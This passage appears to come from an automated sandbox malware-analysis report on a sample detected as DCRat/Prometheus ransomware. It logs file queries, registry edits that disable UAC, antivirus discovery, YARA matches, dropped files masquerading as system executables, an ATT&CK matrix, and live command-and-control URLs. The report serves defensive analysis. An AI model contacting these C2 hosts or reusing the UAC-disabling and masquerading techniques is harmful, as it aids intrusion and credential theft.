Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Queries volume information: C:\Users\user\Music\ApplicationFrameHost.exe VolumeInformation
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Queries volume information: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe VolumeInformation
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Queries volume information: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe VolumeInformation
Source: C:\Recovery\smartscreen.exe	Queries volume information: C:\Recovery\smartscreen.exe VolumeInformation
Source: C:\Recovery\smartscreen.exe	Queries volume information: C:\Recovery\smartscreen.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Queries volume information: C:\Users\user\Music\ApplicationFrameHost.exe VolumeInformation

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Registry value created: PromptOnSecureDesktop 0

Jump to behavior

Disables UAC (registry)

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: C:\Users\user\Music\ApplicationFrameHost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Music\ApplicationFrameHost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1329052019.0000000003763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2244680971.0000000003501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.1437153809.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1329052019.0000000003574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2057331654.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2197343106.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003C.00000002.1511882111.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2218726664.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2060026074.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2155072877.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2324073661.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2334210958.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1329052019.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2197343106.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1364796894.000000001333D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cvXu2RR10n.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 7980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vAJjQbsDlJtvByBkfqttADkNAptf.exe PID: 8076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vAJjQbsDlJtvByBkfqttADkNAptf.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 8268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 8664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 8748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 8768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 8796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 9516, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1329052019.0000000003763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2244680971.0000000003501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.1437153809.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1329052019.0000000003574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2057331654.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2197343106.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003C.00000002.1511882111.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2218726664.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2060026074.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2155072877.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2324073661.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2334210958.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1329052019.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2197343106.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1364796894.000000001333D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cvXu2RR10n.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 7980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vAJjQbsDlJtvByBkfqttADkNAptf.exe PID: 8076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vAJjQbsDlJtvByBkfqttADkNAptf.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 8268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 8664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 8748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 8768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 8796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 9516, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	121 Masquerading	OS Credential Dumping	241 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	11 Scripting	1 Scheduled Task/Job	21 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	161 Virtualization/Sandbox Evasion	Security Account Manager	161 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Bypass User Account Control	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	44 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Bypass User Account Control	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
cvXu2RR10n.exe	68%	Virustotal		Browse
cvXu2RR10n.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
cvXu2RR10n.exe	100%	Avira	HEUR/AGEN.1323984
cvXu2RR10n.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\smartscreen.exe	100%	Avira	HEUR/AGEN.1323984
C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs	100%	Avira	VBS/Starter.VPVT
C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs	100%	Avira	VBS/Runner.VPXJ
C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe	100%	Avira	HEUR/AGEN.1323984
C:\Recovery\smartscreen.exe	100%	Joe Sandbox ML
C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe	100%	Joe Sandbox ML
C:\Recovery\smartscreen.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\Music\ApplicationFrameHost.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus

Source	Detection	Scanner	Label
http://arabna4a.beget.tech/L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU	100%	Avira URL Cloud	malware
